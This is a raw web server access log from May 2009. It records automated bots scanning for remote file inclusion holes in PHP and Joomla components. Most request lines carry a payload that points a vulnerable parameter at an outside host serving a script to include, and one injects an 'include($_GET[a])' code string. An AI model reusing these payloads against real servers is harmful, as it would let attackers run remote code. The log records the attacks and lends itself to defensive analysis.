89.108.67.180 - - [12/May/2009:02:33:39 -0400] "GET /logs/access_log.Q108100400//s_loadenv.inc.php?DOCUMENT_ROOT=http://free-merchant-account.investstores.com/id.txt? HTTP/1.1" 404 243 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
89.108.67.180 - - [12/May/2009:02:33:39 -0400] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://free-merchant-account.investstores.com/id.txt? HTTP/1.1" 404 216 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
62.140.23.192 - - [12/May/2009:02:33:42 -0400] "GET /logs/access_log.Q109022600//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://gymnasticscoaching.com/id1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
59.109.75.80 - - [12/May/2009:02:33:54 -0400] "GET /logs/access_log.Q109012500/samplelinksdir.php?path[docroot]=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.0" 404 243 "-" "Mozilla/5.0"
66.232.102.70 - - [12/May/2009:02:34:00 -0400] "GET /logs/access_log.Q109032900///skin/zero_vote/setup.php?dir=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 251 "-" "libwww-perl/5.813"
66.232.102.70 - - [12/May/2009:02:34:00 -0400] "GET ///skin/zero_vote/setup.php?dir=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 224 "-" "libwww-perl/5.813"
66.232.102.70 - - [12/May/2009:02:34:00 -0400] "GET /logs///skin/zero_vote/setup.php?dir=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 229 "-" "libwww-perl/5.813"
62.140.23.192 - - [12/May/2009:02:34:02 -0400] "GET /logs/error_log.Q109050600//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://gymnasticscoaching.com/id1.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
89.108.67.180 - - [12/May/2009:02:34:20 -0400] "GET /logs/access_log.Q108100400//s_loadenv.inc.php?DOCUMENT_ROOT=http://free-merchant-account.investstores.com/id.txt? HTTP/1.1" 404 243 "-" "libwww-perl/5.812"
89.108.67.180 - - [12/May/2009:02:34:20 -0400] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://free-merchant-account.investstores.com/id.txt? HTTP/1.1" 404 216 "-" "libwww-perl/5.812"
218.150.79.146 - - [12/May/2009:02:34:22 -0400] "GET /logs/access_log.Q108110200/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.powerledshop.com/tst//data/fx1?? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
89.108.67.180 - - [12/May/2009:02:34:22 -0400] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://free-merchant-account.investstores.com/id.txt? HTTP/1.1" 404 221 "-" "libwww-perl/5.812"
89.108.67.180 - - [12/May/2009:02:34:38 -0400] "GET /logs/access_log.Q108102500//s_loadenv.inc.php?DOCUMENT_ROOT=http://free-merchant-account.investstores.com/id.txt? HTTP/1.1" 404 243 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
66.232.102.70 - - [12/May/2009:02:34:42 -0400] "GET /logs/access_log.Q108100900///skin/zero_vote/setup.php?dir=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 251 "-" "libwww-perl/5.813"
202.89.33.167 - - [12/May/2009:02:35:27 -0400] "GET /logs/access_log.Q109042600//?_SERVER[DOCUMENT_ROOT]=http://www.info-design.fr//language/fonts/id1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
89.108.67.180 - - [12/May/2009:02:35:38 -0400] "GET /logs/access_log.Q108102500//s_loadenv.inc.php?DOCUMENT_ROOT=http://free-merchant-account.investstores.com/id.txt? HTTP/1.1" 404 243 "-" "libwww-perl/5.812"
89.108.67.180 - - [12/May/2009:02:36:20 -0400] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://free-merchant-account.investstores.com/id.txt? HTTP/1.1" 404 216 "-" "libwww-perl/5.812"
193.221.119.126 - - [12/May/2009:02:36:27 -0400] "GET /logs/access_log.Q109050200/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
218.150.79.146 - - [12/May/2009:02:36:32 -0400] "GET /logs/access_log.Q109050200%20%20/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.powerledshop.com/tst//data/fx1?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
72.30.142.126 - - [12/May/2009:02:36:33 -0400] "GET /logs/error_log.Q109032000 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
218.150.79.146 - - [12/May/2009:02:36:36 -0400] "GET /logs/access_log.Q108110200%20%20/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.powerledshop.com/tst//data/fx1?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
209.59.12.99 - - [12/May/2009:02:37:29 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
193.221.119.126 - - [12/May/2009:02:37:31 -0400] "GET /logs/access_log.Q108110200/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
66.232.102.70 - - [12/May/2009:02:37:36 -0400] "GET ///skin/zero_vote/setup.php?dir=http://flyozoneusa.com/tmp/id1.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
66.232.102.70 - - [12/May/2009:02:37:36 -0400] "GET /logs/access_log.Q108100900%20%20///skin/zero_vote/setup.php?dir=http://flyozoneusa.com/tmp/id1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
66.232.102.70 - - [12/May/2009:02:37:36 -0400] "GET /logs///skin/zero_vote/setup.php?dir=http://flyozoneusa.com/tmp/id1.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
62.128.135.52 - - [12/May/2009:02:38:08 -0400] "GET /logs/error_log.Q109050400/index.php/component/option,com_joomap/Itemid,15/index.php?option=com_joomap&Itemid=&mosConfig_absolute_path=http://www.gitchigaming.com/.inv?? HTTP/1.1" 404 281 "-" "libwww-perl/5.805"
62.128.135.52 - - [12/May/2009:02:38:08 -0400] "GET /logs/access_log.Q109050700/index.php/component/option,com_joomap/Itemid,15/index.php?option=com_joomap&Itemid=&mosConfig_absolute_path=http://www.gitchigaming.com/.inv?? HTTP/1.1" 404 282 "-" "libwww-perl/5.805"
62.128.135.52 - - [12/May/2009:02:38:08 -0400] "GET /index.php/component/option,com_joomap/Itemid,15/index.php?option=com_joomap&Itemid=&mosConfig_absolute_path=http://www.gitchigaming.com/.inv?? HTTP/1.1" 404 255 "-" "libwww-perl/5.805"
62.128.135.52 - - [12/May/2009:02:38:08 -0400] "GET /logs/index.php/component/option,com_joomap/Itemid,15/index.php?option=com_joomap&Itemid=&mosConfig_absolute_path=http://www.gitchigaming.com/.inv?? HTTP/1.1" 404 260 "-" "libwww-perl/5.805"
218.150.79.146 - - [12/May/2009:02:39:01 -0400] "GET /logs/access_log.Q109050200%20%20/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.powerledshop.com/tst//data/fx1?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
72.30.142.126 - - [12/May/2009:02:39:02 -0400] "GET /logs/access_log.Q107112900 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
206.188.209.31 - - [12/May/2009:02:39:03 -0400] "GET /!rfi%20administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
206.188.209.31 - - [12/May/2009:02:39:05 -0400] "GET /logs/!rfi%20administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
206.188.209.31 - - [12/May/2009:02:39:05 -0400] "GET /logs/access_log.Q109050200/!rfi%20administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
218.150.79.146 - - [12/May/2009:02:39:07 -0400] "GET /logs/access_log.Q108110200%20%20/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.powerledshop.com/tst//data/fx1?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
63.148.24.80 - - [12/May/2009:02:39:08 -0400] "GET /logs/!rfi%20administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
63.148.24.80 - - [12/May/2009:02:39:08 -0400] "GET /!rfi%20administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
63.148.24.80 - - [12/May/2009:02:39:10 -0400] "GET /!rfi%20administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
63.148.24.80 - - [12/May/2009:02:39:10 -0400] "GET /logs/!rfi%20administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
63.148.24.80 - - [12/May/2009:02:39:10 -0400] "GET /logs/access_log.Q109050200%20%20/!rfi%20administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
63.148.24.80 - - [12/May/2009:02:39:13 -0400] "GET /logs/access_log.Q109050200%20%20/!rfi%20administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
63.148.24.80 - - [12/May/2009:02:39:23 -0400] "GET /!rfi%20administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
63.148.24.80 - - [12/May/2009:02:39:23 -0400] "GET /logs/access_log.Q109050200%20%20/!rfi%20administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
63.148.24.80 - - [12/May/2009:02:39:23 -0400] "GET /logs/!rfi%20administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
206.188.209.31 - - [12/May/2009:02:39:24 -0400] "GET /logs/access_log.Q108110200/!rfi%20administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
58.227.193.198 - - [12/May/2009:02:39:24 -0400] "GET //?_zb_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
58.227.193.198 - - [12/May/2009:02:39:24 -0400] "GET /logs//?_zb_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 200 1021 "-" "Mozilla/5.0"
58.227.193.198 - - [12/May/2009:02:39:29 -0400] "GET /logs/access_log.Q108100900//?_zb_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
122.153.212.195 - - [12/May/2009:02:39:50 -0400] "GET //snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
122.153.212.195 - - [12/May/2009:02:39:51 -0400] "GET /logs//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
122.153.212.195 - - [12/May/2009:02:39:51 -0400] "GET /logs/access_log.Q109022600%20%20//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
63.148.24.80 - - [12/May/2009:02:39:53 -0400] "GET /logs/!rfi%20administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
63.148.24.80 - - [12/May/2009:02:39:53 -0400] "GET /logs/access_log.Q109050200/!rfi%20administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
63.148.24.80 - - [12/May/2009:02:39:55 -0400] "GET /logs/access_log.Q108110200%20%20/!rfi%20administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
63.148.24.80 - - [12/May/2009:02:40:01 -0400] "GET /!rfi%20administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
61.160.201.12 - - [12/May/2009:02:40:06 -0400] "GET /!rfi%20administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://212.227.74.68/catalog/fx29id.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
61.160.201.12 - - [12/May/2009:02:40:06 -0400] "GET /logs/!rfi%20administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://212.227.74.68/catalog/fx29id.txt? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
61.160.201.12 - - [12/May/2009:02:40:11 -0400] "GET /logs/access_log.Q109050200%20%20/!rfi%20administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://212.227.74.68/catalog/fx29id.txt? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
61.160.201.12 - - [12/May/2009:02:40:29 -0400] "GET /logs/access_log.Q109050200/!rfi%20administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://212.227.74.68/catalog/fx29id.txt? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
61.160.201.12 - - [12/May/2009:02:40:30 -0400] "GET /!rfi%20administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://212.227.74.68/catalog/fx29id.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
61.160.201.12 - - [12/May/2009:02:40:36 -0400] "GET /logs/!rfi%20administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://212.227.74.68/catalog/fx29id.txt? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
61.160.201.12 - - [12/May/2009:02:40:39 -0400] "GET /logs/access_log.Q109050200/!rfi%20administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://212.227.74.68/catalog/fx29id.txt? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
61.160.201.12 - - [12/May/2009:02:40:39 -0400] "GET /logs/!rfi%20administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://212.227.74.68/catalog/fx29id.txt? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
61.160.201.12 - - [12/May/2009:02:40:39 -0400] "GET /!rfi%20administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://212.227.74.68/catalog/fx29id.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
83.206.45.1 - - [12/May/2009:02:40:43 -0400] "GET /logs/error_log.Q109033100/index.php/component/option,com_joomap/Itemid,15/index.php?option=com_joomap&Itemid=&mosConfig_absolute_path=http://www.gitchigaming.com/.inv?? HTTP/1.1" 404 281 "-" "libwww-perl/5.803"
83.206.45.1 - - [12/May/2009:02:40:43 -0400] "GET /index.php/component/option,com_joomap/Itemid,15/index.php?option=com_joomap&Itemid=&mosConfig_absolute_path=http://www.gitchigaming.com/.inv?? HTTP/1.1" 404 255 "-" "libwww-perl/5.803"
83.206.45.1 - - [12/May/2009:02:40:43 -0400] "GET /logs/index.php/component/option,com_joomap/Itemid,15/index.php?option=com_joomap&Itemid=&mosConfig_absolute_path=http://www.gitchigaming.com/.inv?? HTTP/1.1" 404 260 "-" "libwww-perl/5.803"
72.30.142.126 - - [12/May/2009:02:40:44 -0400] "GET /logs/access_log.Q108072300 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
217.115.136.12 - - [12/May/2009:02:40:49 -0400] "GET /logs/access_log.Q109042600//?_SERVER[DOCUMENT_ROOT]=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
63.148.24.80 - - [12/May/2009:02:40:51 -0400] "GET /logs/access_log.Q108110200%20%20/!rfi%20administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
63.148.24.80 - - [12/May/2009:02:40:55 -0400] "GET /!rfi%20administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
63.148.24.80 - - [12/May/2009:02:40:55 -0400] "GET /logs/access_log.Q109050200/!rfi%20administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
63.148.24.80 - - [12/May/2009:02:40:57 -0400] "GET /logs/access_log.Q108110200/!rfi%20administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
63.148.24.80 - - [12/May/2009:02:40:58 -0400] "GET /logs/!rfi%20administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
63.148.24.80 - - [12/May/2009:02:41:20 -0400] "GET /logs/access_log.Q108110200%20%20/!rfi%20administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
63.148.24.80 - - [12/May/2009:02:41:22 -0400] "GET /logs/!rfi%20administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
63.148.24.80 - - [12/May/2009:02:41:22 -0400] "GET /!rfi%20administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
63.148.24.80 - - [12/May/2009:02:41:22 -0400] "GET /logs/access_log.Q109050200/!rfi%20administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
63.148.24.80 - - [12/May/2009:02:41:47 -0400] "GET /!rfi%20administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
63.148.24.80 - - [12/May/2009:02:41:47 -0400] "GET /logs/!rfi%20administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
63.148.24.80 - - [12/May/2009:02:41:47 -0400] "GET /logs/access_log.Q109050200/!rfi%20administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
63.148.24.80 - - [12/May/2009:02:42:25 -0400] "GET /logs/access_log.Q108110200/!rfi%20administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
209.59.12.99 - - [12/May/2009:02:42:29 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
83.206.45.1 - - [12/May/2009:02:42:39 -0400] "GET /logs/error_log.Q109050400/index.php/component/option,com_joomap/Itemid,15/index.php?option=com_joomap&Itemid=&mosConfig_absolute_path=http://www.gitchigaming.com/.inv?? HTTP/1.1" 404 281 "-" "libwww-perl/5.803"
61.160.201.12 - - [12/May/2009:02:42:47 -0400] "GET /logs/access_log.Q108110200/!rfi%20administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://212.227.74.68/catalog/fx29id.txt? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
63.148.24.80 - - [12/May/2009:02:42:57 -0400] "GET /logs/access_log.Q108110200/!rfi%20administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
62.140.23.192 - - [12/May/2009:02:43:12 -0400] "GET /logs/access_log.Q109022600//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://gymnasticscoaching.com/id1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
61.160.201.12 - - [12/May/2009:02:43:21 -0400] "GET /logs/access_log.Q108110200/!rfi%20administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://212.227.74.68/catalog/fx29id.txt? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
222.239.76.25 - - [12/May/2009:02:43:23 -0400] "GET /logs/access_log.Q109042600//?_SERVER[DOCUMENT_ROOT]=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
61.160.201.12 - - [12/May/2009:02:43:24 -0400] "GET /logs/access_log.Q108110200%20%20/!rfi%20administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://212.227.74.68/catalog/fx29id.txt? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
62.140.23.192 - - [12/May/2009:02:43:34 -0400] "GET /logs/error_log.Q109050600//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://gymnasticscoaching.com/id1.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
63.148.24.80 - - [12/May/2009:02:43:49 -0400] "GET /logs/access_log.Q108110200/!rfi%20administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
72.30.142.126 - - [12/May/2009:02:46:15 -0400] "GET /logs/access_log.Q107111400 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
202.89.33.167 - - [12/May/2009:02:46:35 -0400] "GET /logs/access_log.Q109042600//?_SERVER[DOCUMENT_ROOT]=http://www.info-design.fr//language/fonts/id1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
110.45.144.106 - - [12/May/2009:02:46:54 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
110.45.144.106 - - [12/May/2009:02:46:54 -0400] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
110.45.144.106 - - [12/May/2009:02:46:54 -0400] "GET /logs/access_log.Q108083000//components/com_simpleboard/image_upload.php?sbp=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
110.45.144.106 - - [12/May/2009:02:46:57 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
110.45.144.106 - - [12/May/2009:02:46:57 -0400] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
110.45.144.106 - - [12/May/2009:02:46:57 -0400] "GET /logs/access_log.Q108083000//components/com_simpleboard/image_upload.php?sbp=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
110.45.144.106 - - [12/May/2009:02:47:07 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
110.45.144.106 - - [12/May/2009:02:47:07 -0400] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
110.45.144.106 - - [12/May/2009:02:47:07 -0400] "GET /logs/access_log.Q108083000//components/com_simpleboard/image_upload.php?sbp=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
209.59.12.99 - - [12/May/2009:02:47:29 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.232.102.70 - - [12/May/2009:02:48:36 -0400] "GET /logs/access_log.Q109032900///skin/zero_vote/setup.php?dir=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 251 "-" "libwww-perl/5.813"
66.232.102.70 - - [12/May/2009:02:48:36 -0400] "GET ///skin/zero_vote/setup.php?dir=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 224 "-" "libwww-perl/5.813"
66.232.102.70 - - [12/May/2009:02:48:36 -0400] "GET /logs///skin/zero_vote/setup.php?dir=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 229 "-" "libwww-perl/5.813"
66.232.102.70 - - [12/May/2009:02:48:36 -0400] "GET /logs/access_log.Q108100900///skin/zero_vote/setup.php?dir=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 251 "-" "libwww-perl/5.813"
217.115.136.12 - - [12/May/2009:02:48:36 -0400] "GET /logs/access_log.Q109042600//?_SERVER[DOCUMENT_ROOT]=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
193.34.167.192 - - [12/May/2009:02:49:25 -0400] "GET /logs/access_log.Q108122400//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://iprayedforyoutoday.com/alba.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.808"
193.34.167.192 - - [12/May/2009:02:49:25 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://iprayedforyoutoday.com/alba.txt? HTTP/1.1" 404 208 "-" "libwww-perl/5.808"
193.34.167.192 - - [12/May/2009:02:49:25 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://iprayedforyoutoday.com/alba.txt? HTTP/1.1" 404 213 "-" "libwww-perl/5.808"
110.45.144.106 - - [12/May/2009:02:49:48 -0400] "GET /logs/access_log.Q108083000%20%20//components/com_simpleboard/image_upload.php?sbp=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
110.45.144.106 - - [12/May/2009:02:50:04 -0400] "GET /logs/access_log.Q108083000%20%20//components/com_simpleboard/image_upload.php?sbp=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
110.45.144.106 - - [12/May/2009:02:50:12 -0400] "GET /logs/access_log.Q108083000%20%20//components/com_simpleboard/image_upload.php?sbp=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
110.45.144.106 - - [12/May/2009:02:50:18 -0400] "GET /logs/access_log.Q109012500%20%20//components/com_simpleboard/image_upload.php?sbp=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
